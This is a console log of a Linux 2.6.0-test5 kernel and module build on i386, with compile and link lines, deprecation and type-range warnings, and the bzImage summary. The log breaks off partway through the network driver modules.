CC drivers/video/cfbfillrect.o CC drivers/video/cfbcopyarea.o CC drivers/video/cfbimgblt.o LD drivers/video/built-in.o LD drivers/built-in.o LD sound/built-in.o LD sound/arm/built-in.o LD sound/core/built-in.o LD sound/core/seq/built-in.o LD sound/core/seq/instr/built-in.o LD sound/drivers/built-in.o LD sound/drivers/mpu401/built-in.o LD sound/drivers/opl3/built-in.o LD sound/drivers/opl4/built-in.o LD sound/drivers/vx/built-in.o LD sound/i2c/built-in.o LD sound/i2c/other/built-in.o LD sound/isa/built-in.o LD sound/isa/ad1816a/built-in.o LD sound/isa/ad1848/built-in.o LD sound/isa/cs423x/built-in.o LD sound/isa/es1688/built-in.o LD sound/isa/gus/built-in.o LD sound/isa/opti9xx/built-in.o LD sound/isa/sb/built-in.o LD sound/isa/wavefront/built-in.o LD sound/parisc/built-in.o LD sound/pci/built-in.o LD sound/pci/ac97/built-in.o LD sound/pci/ali5451/built-in.o LD sound/pci/cs46xx/built-in.o LD sound/pci/emu10k1/built-in.o LD sound/pci/ice1712/built-in.o LD sound/pci/korg1212/built-in.o LD sound/pci/nm256/built-in.o LD sound/pci/rme9652/built-in.o LD sound/pci/trident/built-in.o LD sound/pci/vx222/built-in.o LD sound/pci/ymfpci/built-in.o LD sound/pcmcia/vx/built-in.o LD sound/ppc/built-in.o LD sound/sparc/built-in.o LD sound/synth/built-in.o LD sound/synth/emux/built-in.o LD sound/usb/built-in.o CC arch/i386/pci/i386.o CC arch/i386/pci/pcbios.o CC arch/i386/pci/direct.o CC arch/i386/pci/fixup.o CC arch/i386/pci/acpi.o CC arch/i386/pci/legacy.o CC arch/i386/pci/irq.o CC arch/i386/pci/common.o LD arch/i386/pci/built-in.o CC net/socket.o CC net/802/p8023.o CC net/802/sysctl_net_802.o CC net/802/fc.o CC net/802/fddi.o LD net/802/built-in.o LD net/8021q/built-in.o CC net/atm/addr.o CC net/atm/pvc.o CC net/atm/signaling.o CC net/atm/svc.o CC net/atm/common.o CC net/atm/atm_misc.o CC net/atm/raw.o CC net/atm/resources.o CC net/atm/ipcommon.o CC net/atm/proc.o LD net/atm/atm.o CC net/atm/clip.o LD net/atm/built-in.o CC net/core/sock.o CC net/core/skbuff.o CC net/core/iovec.o CC net/core/datagram.o CC net/core/scm.o CC net/core/sysctl_net_core.o CC net/core/flow.o CC net/core/dev.o CC net/core/ethtool.o CC net/core/net-sysfs.o CC net/core/dev_mcast.o CC net/core/dst.o CC net/core/neighbour.o CC net/core/rtnetlink.o CC net/core/utils.o CC net/core/link_watch.o CC net/core/filter.o CC net/core/netfilter.o CC net/core/wireless.o LD net/core/built-in.o LD net/decnet/netfilter/built-in.o LD net/decnet/built-in.o CC net/ethernet/eth.o CC net/ethernet/sysctl_net_ether.o LD net/ethernet/built-in.o CC net/ipv4/utils.o CC net/ipv4/route.o CC net/ipv4/inetpeer.o CC net/ipv4/protocol.o CC net/ipv4/ip_input.o CC net/ipv4/ip_fragment.o CC net/ipv4/ip_forward.o CC net/ipv4/ip_options.o CC net/ipv4/ip_output.o CC net/ipv4/ip_sockglue.o CC net/ipv4/tcp.o CC net/ipv4/tcp_input.o CC net/ipv4/tcp_output.o CC net/ipv4/tcp_timer.o CC net/ipv4/tcp_ipv4.o CC net/ipv4/tcp_minisocks.o CC net/ipv4/tcp_diag.o CC net/ipv4/raw.o CC net/ipv4/udp.o CC net/ipv4/arp.o CC net/ipv4/icmp.o CC net/ipv4/devinet.o CC net/ipv4/af_inet.o CC net/ipv4/igmp.o CC net/ipv4/sysctl_net_ipv4.o CC net/ipv4/fib_frontend.o CC net/ipv4/fib_semantics.o CC net/ipv4/fib_hash.o CC net/ipv4/proc.o CC net/ipv4/fib_rules.o CC net/ipv4/ip_nat_dumb.o CC net/ipv4/syncookies.o LD net/ipv4/netfilter/built-in.o CC net/ipv4/xfrm4_policy.o CC net/ipv4/xfrm4_state.o CC net/ipv4/xfrm4_input.o CC net/ipv4/xfrm4_tunnel.o LD net/ipv4/built-in.o LD net/lapb/built-in.o CC net/netlink/af_netlink.o LD net/netlink/built-in.o LD net/packet/built-in.o CC net/sched/sch_generic.o LD net/sched/built-in.o LD net/sunrpc/built-in.o CC net/unix/af_unix.o CC net/unix/garbage.o CC net/unix/sysctl_net_unix.o LD net/unix/unix.o LD net/unix/built-in.o LD net/wanrouter/built-in.o LD net/x25/built-in.o CC net/xfrm/xfrm_policy.o CC net/xfrm/xfrm_state.o CC net/xfrm/xfrm_input.o CC net/xfrm/xfrm_algo.o CC net/xfrm/xfrm_output.o CC net/xfrm/xfrm_export.o LD net/xfrm/built-in.o CC net/netsyms.o CC net/sysctl_net.o LD net/built-in.o LD lib/zlib_deflate/built-in.o CC lib/zlib_inflate/infblock.o CC lib/zlib_inflate/infcodes.o CC lib/zlib_inflate/inffast.o CC lib/zlib_inflate/inflate.o CC lib/zlib_inflate/inftrees.o CC lib/zlib_inflate/infutil.o CC lib/zlib_inflate/inflate_syms.o LD lib/zlib_inflate/zlib_inflate.o LD lib/zlib_inflate/built-in.o HOSTCC lib/gen_crc32table GEN lib/crc32table.h CC lib/crc32.o LD lib/built-in.o CC lib/bust_spinlocks.o CC lib/cmdline.o CC lib/ctype.o CC lib/div64.o CC lib/dump_stack.o CC lib/errno.o CC lib/idr.o CC lib/kobject.o CC lib/radix-tree.o CC lib/rbtree.o CC lib/rwsem.o CC lib/string.o CC lib/vsprintf.o AR lib/lib.a LD arch/i386/lib/built-in.o AS arch/i386/lib/checksum.o CC arch/i386/lib/dec_and_lock.o CC arch/i386/lib/delay.o AS arch/i386/lib/getuser.o CC arch/i386/lib/memcpy.o CC arch/i386/lib/strstr.o CC arch/i386/lib/usercopy.o AR arch/i386/lib/lib.a GEN .version CHK include/linux/compile.h UPD include/linux/compile.h CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 KSYM .tmp_kallsyms1.S AS .tmp_kallsyms1.o LD .tmp_vmlinux2 KSYM .tmp_kallsyms2.S AS .tmp_kallsyms2.o LD vmlinux AS arch/i386/boot/bootsect.o LD arch/i386/boot/bootsect AS arch/i386/boot/setup.o arch/i386/boot/setup.S: Assembler messages: arch/i386/boot/setup.S:165: Warning: value 0x37ffffff truncated to 0x37ffffff LD arch/i386/boot/setup AS arch/i386/boot/compressed/head.o CC arch/i386/boot/compressed/misc.o OBJCOPY arch/i386/boot/compressed/vmlinux.bin GZIP arch/i386/boot/compressed/vmlinux.bin.gz LD arch/i386/boot/compressed/piggy.o LD arch/i386/boot/compressed/vmlinux OBJCOPY arch/i386/boot/vmlinux.bin HOSTCC arch/i386/boot/tools/build BUILD arch/i386/boot/bzImage Root device is (3, 3) Boot sector 512 bytes. Setup is 4847 bytes. System is 1421 kB Kernel: arch/i386/boot/bzImage is ready root@3[linux-2.6.0-test5]# make modules HOSTCC scripts/modpost.o HOSTLD scripts/modpost make[1]: `arch/i386/kernel/asm-offsets.s' is up to date. CC [M] arch/i386/kernel/msr.o CC [M] arch/i386/kernel/cpuid.o CC [M] arch/i386/kernel/apm.o CC [M] fs/binfmt_aout.o CC [M] fs/binfmt_misc.o CC [M] fs/autofs4/init.o CC [M] fs/autofs4/inode.o CC [M] fs/autofs4/root.o CC [M] fs/autofs4/symlink.o CC [M] fs/autofs4/waitq.o CC [M] fs/autofs4/expire.o LD [M] fs/autofs4/autofs4.o CC [M] fs/coda/psdev.o CC [M] fs/coda/cache.o CC [M] fs/coda/cnode.o CC [M] fs/coda/inode.o CC [M] fs/coda/dir.o fs/coda/dir.c: In function `coda_venus_readdir': fs/coda/dir.c:592: warning: comparison is always false due to limited range of data type CC [M] fs/coda/file.o CC [M] fs/coda/upcall.o CC [M] fs/coda/coda_linux.o CC [M] fs/coda/symlink.o CC [M] fs/coda/pioctl.o CC [M] fs/coda/sysctl.o LD [M] fs/coda/coda.o CC [M] fs/cramfs/inode.o CC [M] fs/cramfs/uncompress.o LD [M] fs/cramfs/cramfs.o CC [M] fs/exportfs/expfs.o LD [M] fs/exportfs/exportfs.o CC [M] fs/fat/cache.o CC [M] fs/fat/dir.o CC [M] fs/fat/file.o CC [M] fs/fat/inode.o CC [M] fs/fat/misc.o CC [M] fs/fat/fatfs_syms.o LD [M] fs/fat/fat.o CC [M] fs/freevxfs/vxfs_bmap.o CC [M] fs/freevxfs/vxfs_fshead.o CC [M] fs/freevxfs/vxfs_immed.o CC [M] fs/freevxfs/vxfs_inode.o CC [M] fs/freevxfs/vxfs_lookup.o CC [M] fs/freevxfs/vxfs_olt.o CC [M] fs/freevxfs/vxfs_subr.o CC [M] fs/freevxfs/vxfs_super.o LD [M] fs/freevxfs/freevxfs.o CC [M] fs/hpfs/alloc.o CC [M] fs/hpfs/anode.o CC [M] fs/hpfs/buffer.o CC [M] fs/hpfs/dentry.o CC [M] fs/hpfs/dir.o CC [M] fs/hpfs/dnode.o CC [M] fs/hpfs/ea.o CC [M] fs/hpfs/file.o CC [M] fs/hpfs/inode.o CC [M] fs/hpfs/map.o CC [M] fs/hpfs/name.o CC [M] fs/hpfs/namei.o CC [M] fs/hpfs/super.o LD [M] fs/hpfs/hpfs.o CC [M] fs/intermezzo/cache.o CC [M] fs/intermezzo/dcache.o CC [M] fs/intermezzo/dir.o CC [M] fs/intermezzo/ext_attr.o CC [M] fs/intermezzo/file.o CC [M] fs/intermezzo/fileset.o CC [M] fs/intermezzo/inode.o fs/intermezzo/inode.c: In function `presto_put_super': fs/intermezzo/inode.c:170: warning: `MOD_DEC_USE_COUNT' is deprecated (declared at include/linux/module.h:494) CC [M] fs/intermezzo/journal.o CC [M] fs/intermezzo/journal_ext2.o CC [M] fs/intermezzo/journal_ext3.o CC [M] fs/intermezzo/journal_obdfs.o CC [M] fs/intermezzo/journal_reiserfs.o CC [M] fs/intermezzo/journal_tmpfs.o CC [M] fs/intermezzo/journal_xfs.o CC [M] fs/intermezzo/kml_reint.o CC [M] fs/intermezzo/kml_unpack.o CC [M] fs/intermezzo/methods.o CC [M] fs/intermezzo/presto.o CC [M] fs/intermezzo/psdev.o CC [M] fs/intermezzo/replicator.o CC [M] fs/intermezzo/super.o CC [M] fs/intermezzo/sysctl.o CC [M] fs/intermezzo/upcall.o CC [M] fs/intermezzo/vfs.o LD [M] fs/intermezzo/intermezzo.o CC [M] fs/jfs/super.o CC [M] fs/jfs/file.o CC [M] fs/jfs/inode.o CC [M] fs/jfs/namei.o CC [M] fs/jfs/jfs_mount.o CC [M] fs/jfs/jfs_umount.o CC [M] fs/jfs/jfs_xtree.o CC [M] fs/jfs/jfs_imap.o CC [M] fs/jfs/jfs_debug.o CC [M] fs/jfs/jfs_dmap.o CC [M] fs/jfs/jfs_unicode.o CC [M] fs/jfs/jfs_dtree.o CC [M] fs/jfs/jfs_inode.o CC [M] fs/jfs/jfs_extent.o CC [M] fs/jfs/symlink.o CC [M] fs/jfs/jfs_metapage.o CC [M] fs/jfs/jfs_logmgr.o CC [M] fs/jfs/jfs_txnmgr.o CC [M] fs/jfs/jfs_uniupr.o CC [M] fs/jfs/resize.o CC [M] fs/jfs/xattr.o LD [M] fs/jfs/jfs.o CC [M] fs/lockd/clntlock.o CC [M] fs/lockd/clntproc.o CC [M] fs/lockd/host.o CC [M] fs/lockd/svc.o CC [M] fs/lockd/svclock.o CC [M] fs/lockd/svcshare.o CC [M] fs/lockd/svcproc.o CC [M] fs/lockd/svcsubs.o CC [M] fs/lockd/mon.o CC [M] fs/lockd/xdr.o CC [M] fs/lockd/lockd_syms.o CC [M] fs/lockd/xdr4.o CC [M] fs/lockd/svc4proc.o LD [M] fs/lockd/lockd.o CC [M] fs/msdos/namei.o CC [M] fs/msdos/msdosfs_syms.o LD [M] fs/msdos/msdos.o CC [M] fs/ncpfs/dir.o CC [M] fs/ncpfs/file.o CC [M] fs/ncpfs/inode.o CC [M] fs/ncpfs/ioctl.o CC [M] fs/ncpfs/mmap.o CC [M] fs/ncpfs/ncplib_kernel.o CC [M] fs/ncpfs/sock.o CC [M] fs/ncpfs/ncpsign_kernel.o CC [M] fs/ncpfs/getopt.o CC [M] fs/ncpfs/symlink.o LD [M] fs/ncpfs/ncpfs.o CC [M] fs/nfs/dir.o CC [M] fs/nfs/file.o CC [M] fs/nfs/inode.o CC [M] fs/nfs/nfs2xdr.o CC [M] fs/nfs/pagelist.o CC [M] fs/nfs/proc.o CC [M] fs/nfs/read.o CC [M] fs/nfs/symlink.o CC [M] fs/nfs/unlink.o CC [M] fs/nfs/write.o CC [M] fs/nfs/nfs3proc.o CC [M] fs/nfs/nfs3xdr.o LD [M] fs/nfs/nfs.o CC [M] fs/nfsd/nfssvc.o CC [M] fs/nfsd/nfsctl.o CC [M] fs/nfsd/nfsproc.o CC [M] fs/nfsd/nfsfh.o CC [M] fs/nfsd/vfs.o CC [M] fs/nfsd/export.o CC [M] fs/nfsd/auth.o CC [M] fs/nfsd/lockd.o CC [M] fs/nfsd/nfscache.o CC [M] fs/nfsd/nfsxdr.o CC [M] fs/nfsd/stats.o CC [M] fs/nfsd/nfs3proc.o CC [M] fs/nfsd/nfs3xdr.o LD [M] fs/nfsd/nfsd.o CC [M] fs/nls/nls_cp437.o CC [M] fs/nls/nls_cp737.o CC [M] fs/nls/nls_cp775.o CC [M] fs/nls/nls_cp850.o CC [M] fs/nls/nls_cp852.o CC [M] fs/nls/nls_cp855.o CC [M] fs/nls/nls_cp857.o CC [M] fs/nls/nls_cp860.o CC [M] fs/nls/nls_cp861.o CC [M] fs/nls/nls_cp862.o CC [M] fs/nls/nls_cp863.o CC [M] fs/nls/nls_cp864.o CC [M] fs/nls/nls_cp865.o CC [M] fs/nls/nls_cp866.o CC [M] fs/nls/nls_cp869.o CC [M] fs/nls/nls_cp874.o CC [M] fs/nls/nls_tis-620.o CC [M] fs/nls/nls_cp932.o CC [M] fs/nls/nls_sjis.o CC [M] fs/nls/nls_euc-jp.o CC [M] fs/nls/nls_cp936.o CC [M] fs/nls/nls_gb2312.o CC [M] fs/nls/nls_cp949.o CC [M] fs/nls/nls_euc-kr.o CC [M] fs/nls/nls_cp950.o CC [M] fs/nls/nls_big5.o CC [M] fs/nls/nls_cp1250.o CC [M] fs/nls/nls_cp1251.o CC [M] fs/nls/nls_iso8859-1.o CC [M] fs/nls/nls_iso8859-2.o CC [M] fs/nls/nls_iso8859-3.o CC [M] fs/nls/nls_iso8859-4.o CC [M] fs/nls/nls_iso8859-5.o CC [M] fs/nls/nls_iso8859-6.o CC [M] fs/nls/nls_iso8859-7.o CC [M] fs/nls/nls_cp1255.o CC [M] fs/nls/nls_iso8859-8.o CC [M] fs/nls/nls_iso8859-9.o CC [M] fs/nls/nls_iso8859-13.o CC [M] fs/nls/nls_iso8859-14.o CC [M] fs/nls/nls_iso8859-15.o CC [M] fs/nls/nls_koi8-r.o CC [M] fs/nls/nls_koi8-u.o CC [M] fs/nls/nls_koi8-ru.o CC [M] fs/nls/nls_utf8.o CC [M] fs/ntfs/aops.o CC [M] fs/ntfs/attrib.o CC [M] fs/ntfs/compress.o CC [M] fs/ntfs/debug.o CC [M] fs/ntfs/dir.o CC [M] fs/ntfs/file.o CC [M] fs/ntfs/inode.o CC [M] fs/ntfs/mft.o CC [M] fs/ntfs/mst.o CC [M] fs/ntfs/namei.o CC [M] fs/ntfs/super.o fs/ntfs/super.c: In function `is_boot_sector_ntfs': fs/ntfs/super.c:375: warning: integer constant is too large for "long" type CC [M] fs/ntfs/sysctl.o CC [M] fs/ntfs/time.o CC [M] fs/ntfs/unistr.o CC [M] fs/ntfs/upcase.o LD [M] fs/ntfs/ntfs.o CC [M] fs/romfs/inode.o LD [M] fs/romfs/romfs.o CC [M] fs/smbfs/proc.o CC [M] fs/smbfs/dir.o CC [M] fs/smbfs/cache.o CC [M] fs/smbfs/sock.o CC [M] fs/smbfs/inode.o CC [M] fs/smbfs/file.o CC [M] fs/smbfs/ioctl.o fs/smbfs/ioctl.c: In function `smb_ioctl': fs/smbfs/ioctl.c:36: warning: comparison is always false due to limited range of data type fs/smbfs/ioctl.c:36: warning: comparison is always false due to limited range of data type fs/smbfs/ioctl.c:36: warning: comparison is always false due to limited range of data type fs/smbfs/ioctl.c:36: warning: comparison is always false due to limited range of data type CC [M] fs/smbfs/getopt.o CC [M] fs/smbfs/symlink.o CC [M] fs/smbfs/smbiod.o fs/smbfs/smbiod.c: In function `smbiod': fs/smbfs/smbiod.c:285: warning: `MOD_INC_USE_COUNT' is deprecated (declared at include/linux/module.h:482) fs/smbfs/smbiod.c:333: warning: `MOD_DEC_USE_COUNT' is deprecated (declared at include/linux/module.h:494) CC [M] fs/smbfs/request.o LD [M] fs/smbfs/smbfs.o CC [M] fs/sysv/ialloc.o CC [M] fs/sysv/balloc.o CC [M] fs/sysv/inode.o CC [M] fs/sysv/itree.o CC [M] fs/sysv/file.o CC [M] fs/sysv/dir.o CC [M] fs/sysv/namei.o CC [M] fs/sysv/super.o CC [M] fs/sysv/symlink.o LD [M] fs/sysv/sysv.o CC [M] fs/udf/balloc.o CC [M] fs/udf/dir.o CC [M] fs/udf/file.o CC [M] fs/udf/ialloc.o CC [M] fs/udf/inode.o CC [M] fs/udf/lowlevel.o CC [M] fs/udf/namei.o CC [M] fs/udf/partition.o CC [M] fs/udf/super.o CC [M] fs/udf/truncate.o CC [M] fs/udf/symlink.o CC [M] fs/udf/fsync.o CC [M] fs/udf/crc.o CC [M] fs/udf/directory.o CC [M] fs/udf/misc.o CC [M] fs/udf/udftime.o CC [M] fs/udf/unicode.o LD [M] fs/udf/udf.o CC [M] fs/ufs/balloc.o CC [M] fs/ufs/cylinder.o CC [M] fs/ufs/dir.o CC [M] fs/ufs/file.o CC [M] fs/ufs/ialloc.o CC [M] fs/ufs/inode.o CC [M] fs/ufs/namei.o CC [M] fs/ufs/super.o CC [M] fs/ufs/symlink.o CC [M] fs/ufs/truncate.o CC [M] fs/ufs/util.o LD [M] fs/ufs/ufs.o CC [M] fs/vfat/namei.o CC [M] fs/vfat/vfatfs_syms.o LD [M] fs/vfat/vfat.o CC [M] drivers/acpi/ac.o CC [M] drivers/acpi/battery.o CC [M] drivers/acpi/button.o CC [M] drivers/acpi/fan.o CC [M] drivers/acpi/processor.o CC [M] drivers/acpi/thermal.o CC [M] drivers/acpi/asus_acpi.o CC [M] drivers/acpi/toshiba_acpi.o CC [M] drivers/atm/zatm.o drivers/atm/zatm.c: In function `zatm_module_init': drivers/atm/zatm.c:1623: warning: `MOD_INC_USE_COUNT' is deprecated (declared at include/linux/module.h:482) CC [M] drivers/atm/uPD98402.o drivers/atm/uPD98402.c: In function `init_module': drivers/atm/uPD98402.c:265: warning: `MOD_INC_USE_COUNT' is deprecated (declared at include/linux/module.h:482) CC [M] drivers/atm/nicstar.o CC [M] drivers/atm/horizon.o drivers/atm/horizon.c: In function `hrz_check_args': drivers/atm/horizon.c:2912: warning: comparison is always false due to limited range of data type CC [M] drivers/atm/iphase.o CC [M] drivers/atm/suni.o CC [M] drivers/atm/fore200e.o objcopy -Iihex drivers/atm/pca200e.data -Obinary drivers/atm/pca200e.bin.gz gzip -df drivers/atm/pca200e.bin.gz HOSTCC drivers/atm/fore200e_mkfirm drivers/atm/fore200e_mkfirm -k -b _fore200e_pca_fw \ -i drivers/atm/pca200e.bin -o drivers/atm/fore200e_pca_fw.c CC [M] drivers/atm/fore200e_pca_fw.o LD [M] drivers/atm/fore_200e.o CC [M] drivers/atm/eni.o drivers/atm/eni.c: In function `eni_init_one': drivers/atm/eni.c:2275: warning: `MOD_INC_USE_COUNT' is deprecated (declared at include/linux/module.h:482) drivers/atm/eni.c:2310: warning: `MOD_DEC_USE_COUNT' is deprecated (declared at include/linux/module.h:494) CC [M] drivers/atm/idt77252.o drivers/atm/idt77252.c: In function `idt77252_open': drivers/atm/idt77252.c:2547: warning: `MOD_INC_USE_COUNT' is deprecated (declared at include/linux/module.h:482) drivers/atm/idt77252.c: In function `idt77252_close': drivers/atm/idt77252.c:2634: warning: `MOD_DEC_USE_COUNT' is deprecated (declared at include/linux/module.h:494) CC [M] drivers/atm/idt77105.o CC [M] drivers/atm/atmtcp.o CC [M] drivers/atm/firestream.o CC [M] drivers/atm/lanai.o drivers/atm/lanai.c: In function `lanai_dev_open': drivers/atm/lanai.c:2245: warning: `MOD_INC_USE_COUNT' is deprecated (declared at include/linux/module.h:482) drivers/atm/lanai.c: In function `lanai_dev_close': drivers/atm/lanai.c:2315: warning: `MOD_DEC_USE_COUNT' is deprecated (declared at include/linux/module.h:494) CC [M] drivers/block/loop.o CC [M] drivers/block/cpqarray.o CC [M] drivers/block/cciss.o drivers/block/cciss.c: In function `cciss_ioctl': drivers/block/cciss.c:640: warning: comparison is always false due to limited range of data type CC [M] drivers/block/DAC960.o CC [M] drivers/block/umem.o CC [M] drivers/block/nbd.o CC [M] drivers/block/paride/paride.o CC [M] drivers/block/paride/aten.o CC [M] drivers/block/paride/bpck.o CC [M] drivers/block/paride/comm.o CC [M] drivers/block/paride/dstr.o CC [M] drivers/block/paride/kbic.o CC [M] drivers/block/paride/epat.o CC [M] drivers/block/paride/epia.o CC [M] drivers/block/paride/frpw.o CC [M] drivers/block/paride/friq.o CC [M] drivers/block/paride/fit2.o CC [M] drivers/block/paride/fit3.o CC [M] drivers/block/paride/on20.o CC [M] drivers/block/paride/on26.o CC [M] drivers/block/paride/ktti.o CC [M] drivers/block/paride/bpck6.o CC [M] drivers/block/paride/pd.o CC [M] drivers/block/paride/pcd.o CC [M] drivers/block/paride/pf.o CC [M] drivers/block/paride/pt.o CC [M] drivers/block/paride/pg.o CC [M] drivers/char/lp.o CC [M] drivers/char/dtlk.o CC [M] drivers/char/n_r3964.o drivers/char/n_r3964.c: In function `r3964_open': drivers/char/n_r3964.c:1073: warning: `MOD_INC_USE_COUNT' is deprecated (declared at include/linux/module.h:482) drivers/char/n_r3964.c: In function `r3964_close': drivers/char/n_r3964.c:1192: warning: `MOD_DEC_USE_COUNT' is deprecated (declared at include/linux/module.h:494) CC [M] drivers/char/applicom.o drivers/char/applicom.c:260:2: warning: #warning "LEAK" drivers/char/applicom.c:524:2: warning: #warning "Je suis stupide. DW. - copy*user in cli" CC [M] drivers/char/sonypi.o CC [M] drivers/char/rtc.o CC [M] drivers/char/nvram.o CC [M] drivers/char/tpqic02.o CC [M] drivers/char/ppdev.o CC [M] drivers/char/agp/backend.o drivers/char/agp/backend.c:322: warning: `agp_setup' defined but not used CC [M] drivers/char/agp/frontend.o CC [M] drivers/char/agp/generic.o CC [M] drivers/char/agp/isoch.o LD [M] drivers/char/agp/agpgart.o CC [M] drivers/char/agp/ali-agp.o CC [M] drivers/char/agp/amd-k7-agp.o CC [M] drivers/char/agp/intel-agp.o CC [M] drivers/char/agp/sis-agp.o CC [M] drivers/char/agp/sworks-agp.o CC [M] drivers/char/agp/via-agp.o CC [M] drivers/char/drm/i810_drv.o CC [M] drivers/char/drm/i810_dma.o CC [M] drivers/char/drm/i830_drv.o CC [M] drivers/char/drm/i830_dma.o CC [M] drivers/char/drm/i830_irq.o CC [M] drivers/char/drm/mga_drv.o CC [M] drivers/char/drm/mga_dma.o CC [M] drivers/char/drm/mga_state.o CC [M] drivers/char/drm/mga_warp.o CC [M] drivers/char/drm/mga_irq.o CC [M] drivers/char/drm/r128_drv.o CC [M] drivers/char/drm/r128_cce.o CC [M] drivers/char/drm/r128_state.o CC [M] drivers/char/drm/r128_irq.o CC [M] drivers/char/drm/radeon_drv.o CC [M] drivers/char/drm/radeon_cp.o CC [M] drivers/char/drm/radeon_state.o CC [M] drivers/char/drm/radeon_mem.o CC [M] drivers/char/drm/radeon_irq.o CC [M] drivers/char/drm/sis_drv.o CC [M] drivers/char/drm/sis_ds.o CC [M] drivers/char/drm/sis_mm.o CC [M] drivers/char/drm/tdfx_drv.o LD [M] drivers/char/drm/tdfx.o LD [M] drivers/char/drm/r128.o LD [M] drivers/char/drm/radeon.o LD [M] drivers/char/drm/mga.o LD [M] drivers/char/drm/i810.o LD [M] drivers/char/drm/i830.o LD [M] drivers/char/drm/sis.o CC [M] drivers/char/mwave/mwavedd.o drivers/char/mwave/mwavedd.c:331:2: warning: #warning "Sleeping on spinlock" CC [M] drivers/char/mwave/smapi.o CC [M] drivers/char/mwave/tp3780i.o CC [M] drivers/char/mwave/3780i.o LD [M] drivers/char/mwave/mwave.o CC [M] drivers/i2c/i2c-core.o CC [M] drivers/i2c/i2c-dev.o CC [M] drivers/i2c/i2c-algo-bit.o CC [M] drivers/i2c/i2c-philips-par.o CC [M] drivers/i2c/i2c-algo-pcf.o CC [M] drivers/ide/ide-tape.o drivers/ide/ide-tape.c: In function `idetape_setup': drivers/ide/ide-tape.c:6245: warning: duplicate `const' CC [M] drivers/ide/ide-floppy.o CC [M] drivers/input/joydev.o CC [M] drivers/input/evdev.o CC [M] drivers/md/linear.o CC [M] drivers/md/raid0.o CC [M] drivers/md/raid1.o CC [M] drivers/md/raid5.o CC [M] drivers/md/xor.o CC [M] drivers/md/multipath.o CC [M] drivers/md/md.o CC [M] drivers/media/radio/radio-maxiradio.o CC [M] drivers/media/radio/radio-gemtek-pci.o CC [M] drivers/media/radio/radio-maestro.o CC [M] drivers/media/video/videodev.o CC [M] drivers/media/video/v4l2-common.o CC [M] drivers/media/video/v4l1-compat.o CC [M] drivers/media/video/bttv-driver.o CC [M] drivers/media/video/bttv-cards.o CC [M] drivers/media/video/bttv-if.o CC [M] drivers/media/video/bttv-risc.o CC [M] drivers/media/video/bttv-vbi.o CC [M] drivers/media/video/zoran_procfs.o CC [M] drivers/media/video/zoran_device.o CC [M] drivers/media/video/zoran_driver.o CC [M] drivers/media/video/zoran_card.o LD [M] drivers/media/video/bttv.o CC [M] drivers/media/video/msp3400.o CC [M] drivers/media/video/tvaudio.o CC [M] drivers/media/video/tda7432.o CC [M] drivers/media/video/tda9875.o CC [M] drivers/media/video/saa5249.o drivers/media/video/saa5249.c: In function `saa5249_attach': drivers/media/video/saa5249.c:217: warning: `MOD_INC_USE_COUNT' is deprecated (declared at include/linux/module.h:482) drivers/media/video/saa5249.c: In function `saa5249_detach': drivers/media/video/saa5249.c:240: warning: `MOD_DEC_USE_COUNT' is deprecated (declared at include/linux/module.h:494) CC [M] drivers/media/video/c-qcam.o CC [M] drivers/media/video/bw-qcam.o CC [M] drivers/media/video/w9966.o CC [M] drivers/media/video/saa7111.o CC [M] drivers/media/video/saa7185.o CC [M] drivers/media/video/zr36060.o CC [M] drivers/media/video/saa7110.o CC [M] drivers/media/video/adv7175.o CC [M] drivers/media/video/bt819.o CC [M] drivers/media/video/bt856.o LD [M] drivers/media/video/zr36067.o CC [M] drivers/media/video/videocodec.o CC [M] drivers/media/video/stradis.o CC [M] drivers/media/video/cpia.o CC [M] drivers/media/video/cpia_pp.o CC [M] drivers/media/video/cpia_usb.o CC [M] drivers/media/video/meye.o CC [M] drivers/media/video/tuner-3036.o drivers/media/video/tuner-3036.c: In function `tuner_attach': drivers/media/video/tuner-3036.c:138: warning: `MOD_INC_USE_COUNT' is deprecated (declared at include/linux/module.h:482) drivers/media/video/tuner-3036.c: In function `tuner_detach': drivers/media/video/tuner-3036.c:152: warning: `MOD_DEC_USE_COUNT' is deprecated (declared at include/linux/module.h:494) CC [M] drivers/media/video/tuner.o CC [M] drivers/media/video/tda9887.o CC [M] drivers/media/video/video-buf.o CC [M] drivers/media/video/btcx-risc.o CC [M] drivers/message/i2o/i2o_core.o CC [M] drivers/message/i2o/i2o_config.o CC [M] drivers/message/i2o/i2o_block.o drivers/message/i2o/i2o_block.c: In function `i2ob_del_device': drivers/message/i2o/i2o_block.c:1507: warning: `MOD_DEC_USE_COUNT' is deprecated (declared at include/linux/module.h:494) CC [M] drivers/message/i2o/i2o_scsi.o CC [M] drivers/message/i2o/i2o_proc.o CC [M] drivers/net/plip.o CC [M] drivers/net/sunhme.o CC [M] drivers/net/sungem.o CC [M] drivers/net/sungem_phy.o CC [M] drivers/net/dgrs.o CC [M] drivers/net/rcpci45.o CC [M] drivers/net/rclanmtl.o LD [M] drivers/net/rcpci.o CC [M] drivers/net/3c59x.o CC [M] drivers/net/ne2k-pci.o CC [M] drivers/net/8390.o CC [M] drivers/net/pcnet32.o CC [M] drivers/net/eepro100.o CC [M] drivers/net/tlan.o CC [M] drivers/net/epic100.o CC [M] drivers/net/sis900.o CC [M] drivers/net/yellowfin.o CC [M] drivers/net/acenic.o CC [M] drivers/net/natsemi.o CC [M] drivers/net/ns83820.o CC [M] drivers/net/fealnx.o CC [M] drivers/net/tg3.o CC [M] drivers/net/via-rhine.o CC [M] drivers/net/starfire.o drivers/net/starfire.c: In function `netdev_open': drivers/net/starfire.c:1178: warning: right shift count &gt;= width of type drivers/net/starfire.c:1179: warning: right shift count &gt;= width of type drivers/net/starfire.c:1180: warning: right shift count &gt;= width of type CC [M] drivers/net/sundance.o CC [M] drivers/net/hamachi.o CC [M] drivers/net/ethertap.o CC [M] drivers/net/sb1000.o CC [M] drivers/net/shaper.o CC [M] drivers/net/hp100.o drivers/net/hp100.c: In function `hp100_probe': drivers/net/hp100.c:384: warning: `check_region' is deprecated (declared at include/linux/ioport.h:117) drivers/net/hp100.c:431: warning: `check_region' is deprecated (declared at include/linux/ioport.h:117) drivers/net/hp100.c:462: warning: `check_region' is deprecated (declared at include/linux/ioport.h:117) drivers/net/hp100.c:470: warning: `check_region' is deprecated (declared at include/linux/ioport.h:117) CC [M] drivers/net/ppp_generic.o CC [M] drivers/net/slhc.o CC [M] drivers/net/ppp_async.o CC [M] drivers/net/ppp_synctty.o CC [M] drivers/net/ppp_deflate.o CC [M] drivers/net/bsd_comp.o CC [M] drivers/net/pppox.o CC [M] drivers/net/pppoe.o CC [M] drivers/net/slip.o CC [M] drivers/net/dummy.o CC [M] 